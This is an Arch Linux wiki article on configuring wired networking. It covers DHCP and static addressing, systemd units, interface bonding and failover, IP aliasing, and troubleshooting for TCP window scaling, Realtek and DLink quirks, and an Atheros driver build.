[[fr:Connexions reseau]]<br />
[[it:Configuring Network]]<br />
[[ja:Network Configuration]]<br />
[[nl:Configuring Network]]<br />
[[pt:Configuring Network]]<br />
[[ro:Configurare retea]]<br />
[[ru:Configuring Network]]<br />
[[sk:Configuring Network]]<br />
[[tr:Ağ_Yapılandırması]]<br />
[[zh-CN:Configuring Network]]<br />
{{Article summary start}}<br />
{{Article summary text|A simple guide for setting up and troubleshooting network.}}<br />
{{Article summary heading|Overview}}<br />
{{Article summary text|{{Networking overview}}}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Jumbo Frames}}<br />
{{Article summary wiki|Firewalls}}<br />
{{Article summary wiki|Samba}}<br />
{{Article summary wiki|Wireless Setup}}<br />
{{Article summary end}}<br />
<br />
== Check the connection ==<br />
<br />
Many times, the basic installation procedure has created a working network configuration. To check if this is so, use the following command:<br />
<br />
{{Note|The {{ic|-c 3}} option calls it three times. See {{ic|man ping}} for more information.}}<br />
<br />
{{hc|$ ping -c 3 www.google.com|2=<br />
PING www.l.google.com (74.125.224.146) 56(84) bytes of data.<br />
64 bytes from 74.125.224.146: icmp_req=1 ttl=50 time=437 ms<br />
64 bytes from 74.125.224.146: icmp_req=2 ttl=50 time=385 ms<br />
64 bytes from 74.125.224.146: icmp_req=3 ttl=50 time=298 ms<br />
<br />
--- www.l.google.com ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 1999ms<br />
rtt min/avg/max/mdev = 298.107/373.642/437.202/57.415 ms}}<br />
<br />
If it works, then you may only wish to personalize your settings from the options below.<br />
<br />
If the previous command complains about unknown hosts, it means that your machine was unable to resolve this domain name. It might be related to your service provider or your router/gateway. You can try pinging a static IP address to prove that your machine has access to the Internet.<br />
<br />
{{hc|$ ping -c 3 8.8.8.8|2=<br />
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.<br />
64 bytes from 8.8.8.8: icmp_req=1 ttl=53 time=52.9 ms<br />
64 bytes from 8.8.8.8: icmp_req=2 ttl=53 time=72.5 ms<br />
64 bytes from 8.8.8.8: icmp_req=3 ttl=53 time=70.6 ms<br />
<br />
--- 8.8.8.8 ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 2002ms<br />
rtt min/avg/max/mdev = 52.975/65.375/72.543/8.803 ms}}<br />
<br />
{{Note|{{ic|8.8.8.8}} is a static address that is easy to remember. It is the address of Google's primary DNS server, therefore it can be considered reliable, and is generally not blocked by content filtering systems and proxies.}}<br />
<br />
If you are able to ping this address, you may try adding this nameserver to your {{ic|/etc/resolv.conf}} file.<br />
<br />
== Set the hostname ==<br />
<br />
A [[Wikipedia:Hostname|hostname]] is a unique name created to identify a machine on a network. To set the hostname: <br />
# hostnamectl set-hostname '''myhostname'''<br />
<br />
{{Note|You no longer need to edit {{ic|/etc/hosts}}, {{pkg|systemd}} will provide host name resolution, and is installed on all systems by default.}}<br />
<br />
To set the hostname temporarily (until a reboot), use the {{ic|hostname}} command from {{Pkg|inetutils}}:<br />
<br />
# hostname ''myhostname''<br />
<br />
== Device Driver ==<br />
<br />
=== Check the driver status ===<br />
<br />
Udev should detect your network interface card ([[Wikipedia:Network_interface_controller|NIC]]) and automatically load the necessary module at start up. Check the "Ethernet controller" entry (or similar) from the {{ic|lspci -v}} output. It should tell you which kernel module contains the driver for your network device. For example:<br />
<br />
{{hc|$ lspci -v|<br />
02:00.0 Ethernet controller: Attansic Technology Corp. L1 Gigabit Ethernet Adapter (rev b0)<br />
...<br />
Kernel driver in use: atl1<br />
Kernel modules: atl1}}<br />
<br />
Next, check that the driver was loaded via {{ic|dmesg <nowiki>|</nowiki> grep ''module_name''}}. For example:<br />
<br />
$ dmesg | grep atl1<br />
...<br />
atl1 0000:02:00.0: eth0 link is up 100 Mbps full duplex<br />
<br />
Skip the next section if the driver was loaded successfully. Otherwise, you will need to know which module is needed for your particular model.<br />
<br />
=== Load the device module ===<br />
<br />
Google for the right module/driver for the chipset. Once you know which module to use, you can [[Kernel modules#Loading|load it]] with:<br />
<br />
# modprobe ''module_name''<br />
<br />
If udev is not detecting and loading the proper module automatically during bootup, you can add it to a {{ic|*.conf}} file from the {{ic|/etc/modules-load.d/}} folder so that you do not need to {{ic|modprobe}} it every time you boot. For example, if {{ic|tg3}} is the network module:<br />
<br />
# tee /etc/modules-load.d/tg3.conf <<< "tg3"<br />
<br />
Other common modules are {{ic|8139too}} for cards with a Realtek chipset, or {{ic|sis900}} for cards with a SiS chipset.<br />
<br />
== Network Interfaces ==<br />
<br />
=== Persistent device names ===<br />
<br />
For motherboards that have integrated NICs, it is important to know which one is considered the primary NIC (e.g. {{ic|eth0}}) and which is considered the secondary NIC (e.g. {{ic|eth1}}). Many configuration issues are caused by users incorrectly configuring the network settings for {{ic|eth0}}, when in fact, they have their Ethernet cable plugged into {{ic|eth1}}.<br />
<br />
[[Udev]] is responsible for which device gets which name. With udev and modular network drivers, the network interface numbering is not persistent across reboots by default, because the drivers are loaded in parallel and, thus, in random order. Configuring your network connection is hard if you do not know if your card will be called {{ic|eth0}} or {{ic|eth1}}. You can fix this using {{ic|ifrename}}. See [[Rename network interfaces]]. It is also possible to manually create udev rules that assign interface names based on the interface's MAC address. See [[Udev#Network device]].<br />
<br />
{{Note|Systemd v197 introduced [http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames Predictable Network Interface Names], which automatically assigns static names to network devices. Interfaces are now prefixed with en (ethernet), wl (WLAN), or ww (WWAN) followed by an automatically generated identifier, creating an entry such as {{ic|enp0s25}}. This behavior may be disabled by adding a symlink:<br />
<br />
# ln -s /dev/null /etc/udev/rules.d/80-net-name-slot.rules<br />
<br />
Users upgrading from an earlier systemd version will have a blank rules file created automatically.}}<br />
<br />
=== Get current device names ===<br />
<br />
Current NIC names can be found via sysfs<br />
<br />
{{hc|$ ls /sys/class/net|<br />
lo eth0 eth1 firewire0}}<br />
<br />
=== Enabling and disabling network interfaces ===<br />
<br />
You can activate or deactivate network interfaces using:<br />
<br />
# ip link set eth0 up<br />
# ip link set eth0 down<br />
<br />
To check the result:<br />
<br />
{{hc|$ ip link show dev eth0|<br />
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master br0 state UP mode DEFAULT qlen 1000<br />
[...]}}<br />
<br />
== Configure the IP address ==<br />
<br />
You have two options: a dynamically assigned address using [[Wikipedia:Dynamic Host Configuration Protocol|DHCP]], or an unchanging "static" address.<br />
<br />
=== Dynamic IP address ===<br />
<br />
==== Manually run DHCP Client Daemon ====<br />
<br />
Please note that {{ic|dhcpcd}} is not {{ic|dhcpd}}.<br />
<br />
{{hc|# dhcpcd eth0|<br />
dhcpcd: version 5.1.1 starting<br />
dhcpcd: eth0: broadcasting for a lease<br />
...<br />
dhcpcd: eth0: leased 192.168.1.70 for 86400 seconds}}<br />
<br />
And now, {{ic|ip addr show dev eth0}} should show your inet address.<br />
<br />
For some people, {{ic|dhclient}} (from the {{Pkg|dhclient}} package) works where {{ic|dhcpcd}} fails.<br />
<br />
==== Run DHCP at boot ====<br />
<br />
If you simply want to use DHCP for your Ethernet connection, you can use {{ic|dhcpcd@.service}} (provided by the {{Pkg|dhcpcd}} package).<br />
<br />
To enable DHCP for {{ic|eth0}}, simply use:<br />
<br />
# systemctl start dhcpcd@eth0<br />
<br />
You can enable the service to automatically start at boot with:<br />
<br />
# systemctl enable dhcpcd@eth0<br />
<br />
If the dhcpd service starts before your network card module ({{bug|30235}}), manually add your network card to {{ic|/etc/modules-load.d/*.conf}}. For example, if your Realtek card needs {{ic|r8169}} to be loaded, create:<br />
<br />
{{hc|/etc/modules-load.d/realtek.conf|<br />
r8169}}<br />
<br />
{{Tip|To find out which modules are used by your network card, use {{ic|lspci -k}}.}}<br />
<br />
If you use DHCP and you do '''not''' want your DNS servers automatically assigned every time you start your network, be sure to add the following to the last section of {{ic|dhcpcd.conf}}:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nohook resolv.conf}}<br />
<br />
To prevent {{ic|dhcpcd}} from adding domain name servers to {{ic|/etc/resolv.conf}}, use the {{ic|nooption}} option:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nooption domain_name_servers}}<br />
<br />
Then add your own DNS name server to {{ic|/etc/resolv.conf}}.<br />
<br />
You may use the {{Pkg|openresolv}} package if several different processes want to control {{ic|/etc/resolv.conf}} (e.g. {{Pkg|dhcpcd}} and a VPN client). No additional configuration for {{Pkg|dhcpcd}} is needed to use {{Pkg|openresolv}}.<br />
<br />
{{Note|It is possible to have a static IP address using {{Pkg|dhcpcd}}. Simply edit your {{ic|/etc/conf.d/dhcpcd}} file to look something like this (where {{ic|x.x.x.x}} is your desired IP address):<br />
<br />
{{bc|1=DHCPCD_ARGS="-q -s x.x.x.x"}}}}<br />
<br />
=== Static IP address ===<br />
<br />
There are various reasons why you may wish to assign static IP addresses on your network. For instance, one may gain a certain degree of predictability with unchanging addresses, or you may not have a DHCP server available.<br />
<br />
{{Note|If you share your Internet connection from a Windows machine without a router, be sure to use static IP addresses on both computers to avoid LAN issues.}}<br />
<br />
You need:<br />
<br />
* Static IP address<br />
* [[Wikipedia:Subnetwork|Subnet mask]]<br />
* [[Wikipedia:Broadcast_address|Broadcast address]]<br />
* [[Wikipedia:Default_gateway|Gateway]]'s IP address<br />
<br />
If you are running a private network, it is safe to use IP addresses in 192.168.*.* for your IP addresses, with a subnet mask of 255.255.255.0 and a broadcast address of 192.168.*.255. The gateway is usually 192.168.*.1 or 192.168.*.254.<br />
<br />
==== Manual assignment ====<br />
<br />
You can assign a static IP address in the console:<br />
<br />
# ip addr add <IP address>/<subnet mask> dev <interface><br />
<br />
For example:<br />
<br />
# ip addr add 192.168.1.2/24 dev eth0<br />
<br />
{{Note|The subnet mask was specified using [[Wikipedia:CIDR_notation|CIDR notation]].}}<br />
<br />
For more options, see {{ic|man ip}}.<br />
<br />
Add your gateway like so:<br />
<br />
# ip route add default via <default gateway IP address><br />
<br />
For example:<br />
<br />
# ip route add default via 192.168.1.1<br />
<br />
If you the get the error "No such process", it means you have to run {{ic|ip link set dev eth0 up}} as root.<br />
<br />
====Manual connection at boot using systemd====<br />
This section details how to manually connect using [[systemd]].<br />
<br />
{{Note|We use {{ic|net0}} as the interface name in these examples, you have to replace all occurrences (including those in the {{ic|BindsTo}} and {{ic|After}} values) with the name of the interface you are configuring.}}<br />
<br />
=====Using [[dhcpcd]]=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Network Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/sbin/ip link set dev net0 up<br />
ExecStart=/usr/sbin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/sbin/dhcpcd net0<br />
<br />
ExecStop=/sbin/dhcpcd -k net0<br />
ExecStop=/sbin/ip addr flush dev net0<br />
ExecStop=/sbin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
# systemctl enable network<br />
<br />
To test, reboot or stop all other network daemons and run as root:<br />
# systemctl start network<br />
<br />
=====Using a static IP address=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses a static IP address and [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Wireless Static IP Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/sbin/ip link set dev net0 up<br />
ExecStart=/usr/sbin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/sbin/ip addr add 192.168.0.10/24 dev net0<br />
ExecStart=/sbin/ip route add default via 192.168.0.1<br />
<br />
ExecStop=/sbin/ip addr flush dev net0<br />
ExecStop=/sbin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
Do not forget to enable it!<br />
# systemctl enable network<br />
<br />
To test, reboot or make sure all other network daemons are stopped and then run as root<br />
# systemctl start network<br />
<br />
==== Calculating addresses ====<br />
<br />
You can use {{ic|ipcalc}} provided by the {{Pkg|ipcalc}} package to calculate IP broadcast, network, netmask, and host ranges for more advanced configurations. For example, I use ethernet over firewire to connect a windows machine to arch. For security and network organization, I placed them on their own network and configured the netmask and broadcast so that they are the only 2 machines on it. To figure out the netmask and broadcast addresses for this, I used ipcalc, providing it with the IP of the arch firewire nic 10.66.66.1, and specifying ipcalc should create a network of only 2 hosts.<br />
<br />
{{hc|$ ipcalc -nb 10.66.66.1 -s 1|2=<br />
Address: 10.66.66.1<br />
<br />
Netmask: 255.255.255.252 = 30<br />
Network: 10.66.66.0/30<br />
HostMin: 10.66.66.1<br />
HostMax: 10.66.66.2<br />
Broadcast: 10.66.66.3<br />
Hosts/Net: 2 Class A, Private Internet}}<br />
<br />
== Load configuration ==<br />
<br />
To test your settings either reboot the computer or reload the relevant systemd services:<br />
<br />
# systemctl restart dhcpcd@eth0<br />
<br />
Try pinging your gateway, DNS server, ISP provider and other Internet sites, in that order, to detect any connection problems along the way, as in this example:<br />
<br />
$ ping -c 3 www.google.com<br />
<br />
== Additional settings ==<br />
<br />
=== ifplugd for laptops ===<br />
<br />
{{Pkg|ifplugd}} in [[Official Repositories]] is a daemon which will automatically configure your Ethernet device when a cable is plugged in and automatically unconfigure it if the cable is pulled. This is useful on laptops with onboard network adapters, since it will only configure the interface when a cable is really connected. Another use is when you just need to restart the network but do not want to restart the computer or do it from the shell.<br />
<br />
By default it is configured to work for the {{ic|eth0}} device. This and other settings like delays can be configured in {{ic|/etc/ifplugd/ifplugd.conf}}.<br />
<br />
Enabling {{ic|net-auto-wired.service}} should start ifplugd on bootup if you have {{Pkg|netcfg}} installed, otherwise you can use {{ic|ifplugd@eth0.service}}.<br />
<br />
=== Bonding or LAG ===<br />
<br />
You will need {{Pkg|netcfg}} from the [[Official Repositories]], as well as the {{AUR|netcfg-bonding}} package from the [[AUR]].<br />
<br />
Edit/create the following files:<br />
<br />
{{hc|/etc/network.d/bonded|2=<br />
CONNECTION="bonding"<br />
INTERFACE="bond0"<br />
SLAVES="eth0 eth1"<br />
IP="dhcp"<br />
DHCP_TIMEOUT=10}}<br />
<br />
{{hc|/etc/modules-load.d/bonding.conf|<br />
bonding}}<br />
<br />
Set up netcfg to use the bond0 interface.<br />
<br />
Start your network:<br />
$ systemctl enable netcfg@bonded<br />
<br />
{{Note|To change the bonding mode (default is round robin) to, e.g, dynamic link aggregation:<br />
<br />
Create {{ic|/etc/modprobe.d/bonding.conf}}:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=4<br />
options bonding miimon=100}}<br />
<br />
For more information about the different bonding policies (and other driver settings) see the [http://sourceforge.net/projects/bonding/files/Documentation/ Linux Ethernet Bonding Driver HOWTO].}}<br />
<br />
To activate the new bonded ports modprobe {{ic|bonding}}, stop {{ic|network}} and start the {{ic|net-profiles}} service:<br />
<br />
# modprobe bonding<br />
# systemctl stop network<br />
# systemctl start net-profiles<br />
<br />
To check the status and bonding mode:<br />
<br />
$ cat /proc/net/bonding/bond0<br />
<br />
==== Wired -> Wireless Failover ====<br />
<br />
Using {{ic|bonding}} to fallback to wireless when the wired ethernet goes down, this also detects the presence of either network connection and starts dhcpcd when either or both are connected.<br />
<br />
You'll need {{Pkg|netcfg}}, {{Pkg|ifplugd}}, and {{Pkg|wpa_supplicant}} from the official repositories.<br />
<br />
First configure the bonding driver to use active-backup:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=active-backup<br />
options bonding miimon=100<br />
options bonding primary=eth0<br />
options bonding max_bonds=0}}<br />
<br />
The `max-bonds` line avoids getting the "Interface bond0 already exists" error.<br />
<br />
Next, configure a {{Pkg|netcfg}} profile to enslave the two hardware interfaces:<br />
<br />
{{hc|/etc/network.d/failover|2=<br />
CONNECTION="bond"<br />
DESCRIPTION="A wired connection with failover to wireless"<br />
INTERFACE="bond0"<br />
SLAVE_INTERFACES=("eth0" "wlan0")<br />
IP="no"<br />
SKIPNOCARRIER="no"}}<br />
<br />
Enable the profile on startup.<br />
<br />
# systemctl enable netcfg@failover<br />
<br />
Configure wpa_supplicant to associate with known networks. This can be done with a netcfg profile (remember to use IP="no"), a wpa_supplicant service running constantly, or on-demand with [[wpa_cli]]. Ways to do this are covered on the [[wpa_supplicant]] page.<br />
<br />
Create an {{Pkg|ifplugd}} action for automatic DHCP assignment on the bonded interface:<br />
<br />
{{hc|/etc/ifplugd/bond_dhcp.action|2=<br />
#!/bin/sh<br />
<br />
case "$2" in<br />
up)<br />
systemctl start "dhcpcd@$1.service" && exit 0<br />
;;<br />
down)<br />
systemctl stop "dhcpcd@$1.service" && exit 0<br />
;;<br />
*)<br />
echo "Wrong arguments" > /dev/stderr<br />
;;<br />
esac<br />
exit 1}}<br />
<br />
and make it executable<br />
<br />
# chmod +x /etc/ifplugd/bond_dhcp.action<br />
<br />
Then create the [[systemd]] service which starts ifplugd for bond0:<br />
<br />
{{hc|/etc/systemd/system/net-auto-bonded@.service|2=<br />
[Unit]<br />
Description=Provides automatic dhcp resolution for bonded failover connection<br />
Requires=netcfg@failover.service<br />
After=netcfg@failover.service<br />
<br />
[Service]<br />
ExecStart=/usr/bin/ifplugd -i %i -r /etc/ifplugd/bond_dhcp.action -fIns<br />
<br />
[Install]<br />
WantedBy=multi-user.target}}<br />
<br />
Enable the net-auto-bonded service and reboot:<br />
<br />
# systemctl enable net-auto-bonded@bond0.service<br />
# reboot<br />
<br />
If you have a wired and wireless connection to the same network, you can probably now disconnect and reconnect the wired connection without losing connectivity. In most cases, even streaming music won't skip!<br />
<br />
=== IP address aliasing ===<br />
<br />
IP aliasing is the process of adding more than one IP address to a network interface. With this, one node on a network can have multiple connections to a network, each serving a different purpose.<br />
<br />
To use IP aliasing from [[netcfg]], change {{ic|POST_UP}} and {{ic|PRE_DOWN}} commands in your network profile to set up the additional IP addresses manually. See [https://bbs.archlinux.org/viewtopic.php?pid=1036395#p1036395 here] for details.<br />
<br />
==== Example ====<br />
<br />
You will need {{Pkg|netcfg}} from the [[Official Repositories]].<br />
<br />
Prepare the configuration:<br />
<br />
{{hc|/etc/network.d/mynetwork|2=<br />
<br />
CONNECTION='ethernet'<br />
DESCRIPTION='Five different addresses on the same NIC.'<br />
INTERFACE='eth0'<br />
IP='static'<br />
ADDR='192.168.1.10'<br />
GATEWAY='192.168.1.1'<br />
DNS=('192.168.1.1')<br />
DOMAIN=''<br />
POST_UP='x=0; for i in 11 12 13 14; do ip addr add 192.168.1.$i/24 brd 192.168.1.255 dev eth0 label eth0:$((x++)); done'<br />
PRE_DOWN='for i in 11 12 13 14; do ip addr del 192.168.1.$i/24 dev eth0; done'}}<br />
<br />
The simply execute: <br />
<br />
$ systemctl enable net-auto-wired.service<br />
<br />
=== Change MAC/hardware address ===<br />
<br />
See [[MAC Address Spoofing]].<br />
<br />
== Troubleshooting ==<br />
<br />
=== Swapping computers on the cable modem ===<br />
<br />
Most domestic cable ISPs (videotron for example) have the cable modem configured to recognize only one client PC, by the MAC address of its network interface. Once the cable modem has learned the MAC address of the first PC or equipment that talks to it, it will not respond to another MAC address in any way. Thus if you swap one PC for another (or for a router), the new PC (or router) will not work with the cable modem, because the new PC (or router) has a MAC address different from the old one. To reset the cable modem so that it will recognise the new PC, you must power the cable modem off and on again. Once the cable modem has rebooted and gone fully online again (indicator lights settled down), reboot the newly connected PC so that it makes a DHCP request, or manually make it request a new DHCP lease.<br />
<br />
If this method does not work, you will need to clone the MAC address of the original machine. See also [[Configuring Network#Change MAC/hardware address|Change MAC/hardware address]].<br />
<br />
=== The TCP window scaling issue ===<br />
<br />
TCP packets contain a "window" value in their headers indicating how much data the other host may send in return. This value is represented with only 16 bits, hence the window size is at most 64Kb. TCP packets are cached for a while (they have to be reordered), and as memory is (or used to be) limited, one host could easily run out of it.<br />
<br />
Back in 1992, as more and more memory became available, [http://www.faqs.org/rfcs/rfc1323.html RFC 1323] was written to improve the situation: Window Scaling. The "window" value, provided in all packets, will be modified by a Scale Factor defined once, at the very beginning of the connection.<br />
<br />
That 8-bit Scale Factor allows the Window to be up to 32 times higher than the initial 64Kb.<br />
<br />
It appears that some broken routers and firewalls on the Internet are rewriting the Scale Factor to 0 which causes misunderstandings between hosts.<br />
<br />
The Linux kernel 2.6.17 introduced a new calculation scheme generating higher Scale Factors, virtually making the aftermaths of the broken routers and firewalls more visible.<br />
<br />
The resulting connection is at best very slow or broken.<br />
<br />
==== How to diagnose the problem ====<br />
<br />
First of all, let's make it clear: this problem is odd. In some cases, you will not be able to use TCP connections (HTTP, FTP, ...) at all and in others, you will be able to communicate with some hosts (very few).<br />
<br />
When you have this problem, the {{ic|dmesg}}'s output is OK, logs are clean and {{ic|ip addr}} will report normal status... and actually everything appears normal.<br />
<br />
If you cannot browse any website, but you can ping some random hosts, chances are great that you're experiencing this issue: ping uses ICMP and is not affected by TCP issues.<br />
<br />
You can try to use Wireshark. You might see successful UDP and ICMP communications but unsuccessful TCP communications (only to foreign hosts).<br />
<br />
==== How to fix it (The bad way) ====<br />
<br />
To fix it the bad way, you can change the tcp_rmem value, on which Scale Factor calculation is based. Although it should work for most hosts, it is not guaranteed, especially for very distant ones.<br />
<br />
# echo "4096 87380 174760" > /proc/sys/net/ipv4/tcp_rmem<br />
<br />
==== How to fix it (The good way) ====<br />
<br />
Simply disable Window Scaling. Since Window Scaling is a nice TCP feature, it may be uncomfortable to disable it, especially if you cannot fix the broken router. There are several ways to disable Window Scaling, and it seems that the most bulletproof way (which will work with most kernels) is to add the following line to {{ic|/etc/sysctl.conf}} (see also [[sysctl]])<br />
<br />
net.ipv4.tcp_window_scaling = 0<br />
<br />
==== How to fix it (The best way) ====<br />
<br />
This issue is caused by broken routers/firewalls, so let's change them. Some users have reported that the broken router was their very own DSL router.<br />
<br />
==== More about it ====<br />
<br />
This section is based on the LWN article [http://lwn.net/Articles/92727/ TCP window scaling and broken routers] and a Kernel Trap article: [http://kerneltrap.org/node/6723 Window Scaling on the Internet].<br />
<br />
There are also several relevant threads on the LKML.<br />
<br />
=== Realtek no link / WOL issue ===<br />
<br />
Users with Realtek 8168 8169 8101 8111(C) based NICs (cards / and on-board) may notice an issue where the NIC seems to be disabled on boot and has no Link light. This can usually be found on a dual boot system where Windows is also installed. It seems that using the offical Realtek drivers (dated anything after May 2007) under Windows is the cause. These newer drivers disable the Wake-On-LAN feature by disabling the NIC at Windows shutdown time, where it will remain disabled until the next time Windows boots. You will be able to notice if this issue is affecting you if the Link light remains off until Windows boots up; during Windows shutdown the Link light will switch off. Normal operation should be that the link light is always on as long as the system is on, even during POST. This issue will also affect other operative systems without newer drivers (eg. Live CDs). Here are a few fixes for this issue:<br />
<br />
==== Method 1 - Rollback/change Windows driver ====<br />
<br />
You can roll back your Windows NIC driver to the Microsoft provided one (if available), or roll back/install an official Realtek driver pre-dating May 2007 (may be on the CD that came with your hardware).<br />
<br />
==== Method 2 - Enable WOL in Windows driver ====<br />
<br />
Probably the best and the fastest fix is to change this setting in the Windows driver. This way it should be fixed system-wide and not only under Arch (eg. live CDs, other operative systems). In Windows, under Device Manager, find your Realtek network adapter and double-click it. Under the Advanced tab, change "Wake-on-LAN after shutdown" to Enable.<br />
<br />
In Windows XP (example)<br />
Right click my computer<br />
--> Hardware tab<br />
--> Device Manager<br />
--> Network Adapters<br />
--> "double click" Realtek ...<br />
--> Advanced tab<br />
--> Wake-On-Lan After Shutdown<br />
--> Enable<br />
<br />
{{Note|Newer Realtek Windows drivers (tested with ''Realtek 8111/8169 LAN Driver v5.708.1030.2008'', dated 2009/01/22, available from GIGABYTE) may refer to this option slightly differently, like ''Shutdown Wake-On-LAN --> Enable''. It seems that switching it to {{ic|Disable}} has no effect (you will notice the Link light still turns off upon Windows shutdown). One rather dirty workaround is to boot to Windows and just reset the system (perform an ungraceful restart/shutdown) thus not giving the Windows driver a chance to disable LAN. The Link light will remain on and the LAN adapter will remain accessible after POST - that is until you boot back to Windows and shut it down properly again.}}<br />
<br />
==== Method 3 - Newer Realtek Linux driver ====<br />
<br />
Any newer driver for these Realtek cards can be found for Linux on the realtek site. (untested but believed to also solve the problem).<br />
<br />
==== Method 4 - Enable ''LAN Boot ROM'' in BIOS/CMOS ====<br />
<br />
It appears that setting ''Integrated Peripherals --> Onboard LAN Boot ROM --> Enabled'' in BIOS/CMOS reactivates the Realtek LAN chip on system boot-up, despite the Windows driver disabling it on OS shutdown.<br />
<br><small>This was tested successfully multiple times with GIGABYTE system board GA-G31M-ES2L with BIOS version F8 released on 2009/02/05. YMMV.</small><br />
<br />
=== DLink G604T/DLink G502T DNS issue ===<br />
<br />
Users with a DLink G604T/DLink G502T router, using DHCP and have firmware v2.00+ (typically users with AUS firmware) may have issues with certain programs not resolving the DNS. One of these programs are unfortunatley pacman. The problem is basically the router in certain situations is not sending the DNS properly to DHCP, which causes programs to try and connect to servers with an IP address of 1.0.0.0 and fail with a connection timed out error<br />
<br />
==== How to diagnose the problem ====<br />
<br />
The best way to diagnose the problem is to use Firefox/Konqueror/links/seamonkey and to enable wget for pacman. If this is a fresh install of Arch Linux, then you may want to consider installing {{ic|links}} through the live CD.<br />
<br />
Firstly, enable wget for pacman (since it gives us info about pacman when it is downloading packages)<br />
Open {{ic|/etc/pacman.conf}} with your favourite editor and uncomment the following line (remove the # if it is there)<br />
<br />
XferCommand=/usr/bin/wget --passive-ftp -c -O %o %u<br />
<br />
While you are editing {{ic|/etc/pacman.conf}}, check the default mirror that pacman uses to download packages.<br />
<br />
Now open up the default mirror in an Internet browser to see if the mirror actually works. If it does work, then do {{ic|pacman -Syy}} (otherwise pick another working mirror and set it to the pacman default). If you get something similar to the following (notice the 1.0.0.0),<br />
<br />
<nowiki>ftp://mirror.pacific.net.au/linux/archlinux/extra/os/i686/extra.db.tar.gz</nowiki><br />
=> '/var/lib/pacman/community.db.tar.gz.part'<br />
Resolving mirror.pacific.net.au... 1.0.0.0<br />
<br />
then you most likely have this problem. The 1.0.0.0 means it is unable to resolve DNS, so we must add it to {{ic|/etc/resolv.conf}}.<br />
<br />
==== How to fix it ====<br />
<br />
Basically what we need to do is to manually add the DNS servers to our {{ic|/etc/resolv.conf}} file. The problem is that DHCP automatically deletes and replaces this file on boot, so we need to edit {{ic|/etc/conf.d/dhcpcd}} and change the flags to stop DHCP from doing this.<br />
<br />
When you open {{ic|/etc/conf.d/dhcpcd}}, you should see something close to the following:<br />
<br />
DHCPCD_ARGS="-t 30 -h $HOSTNAME"<br />
<br />
Add the {{ic|-R}} flag to the arguments, e.g.,<br />
<br />
DHCPCD_ARGS="-R -t 30 -h $HOSTNAME"<br />
<br />
{{Note|1=If you are using {{Pkg|dhcpcd}} >= 4.0.2, the {{ic|-R}} flag has been deprecated. Please see the [[#For DHCP assigned IP address]] section for information on how to use a custom {{ic|/etc/resolv.conf}} file.}}<br />
<br />
Save and close the file; now open {{ic|/etc/resolv.conf}}. You should see a single nameserver (most likely 10.1.1.1). This is the gateway to your router, which we need to connect to in order to get the DNS servers of your ISP. Paste the IP address into your browser and log in to your router. Go to the DNS section, and you should see an IP address in the Primary DNS Server field; copy it and paste it as a nameserver '''ABOVE''' the current gateway one.<br />
<br />
For example, {{ic|/etc/resolv.conf}} should look something along the lines of:<br />
<br />
nameserver 10.1.1.1<br />
<br />
If my primary DNS server is 211.29.132.12, then change {{ic|/etc/resolv.conf}} to:<br />
<br />
nameserver 211.29.132.12<br />
nameserver 10.1.1.1<br />
<br />
Now restart the network daemon by running {{ic|systemctl restart dhcpcd@<interface>}} and do {{ic|pacman -Syy}}. If it syncs correctly with the server, then the problem is solved.<br />
<br />
==== More about it ====<br />
<br />
This is the whirlpool forum (Australian ISP community) which talks about and gives the same solution to the problem:<br />
<br />
http://forums.whirlpool.net.au/forum-replies-archive.cfm/461625.html<br />
<br />
=== Check DHCP problem by releasing IP first ===<br />
<br />
Problem may occur when DHCP get wrong IP assignment. For example when two routers are tied together through VPN. The router that is connected to me by VPN may assigning IP address. To fix it. On a console, as root, release IP address:<br />
<br />
# dhcpcd -k<br />
<br />
Then request a new one:<br />
<br />
# dhcpcd<br />
<br />
Maybe you had to run those two commands many times.<br />
<br />
<br />
=== No eth0 with Atheros AR8161 ===<br />
<br />
With the Atheros AR8161 Gigabit Ethernet card, the ethernet connection is not working out-of-the-box (with the installation media of Feb 2013). The module "alx" needs to be loaded but is not present.<br />
<br />
The driver from [http://linuxwireless.org/en/users/Download/stable/#compat-wireless_stable_releases compat-wireless] (that should become [https://backports.wiki.kernel.org/index.php/Releases compat-drives] from linux 3.7) need to be installed. You need the firmware version with '''pc''' in the filename to have the ethernet drivers.<br />
<br />
$ wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.6/compat-wireless-3.6.8-1-snpc.tar.bz2<br />
$ tar xjf compat-wireless-3.6.8-1-snpc.tar.bz2<br />
$ cd compat-wireless-3.6.8-1-snpc<br />
$ ./scripts/driver-select alx<br />
$ make<br />
$ sudo make install<br />
$ sudo modprobe alx<br />
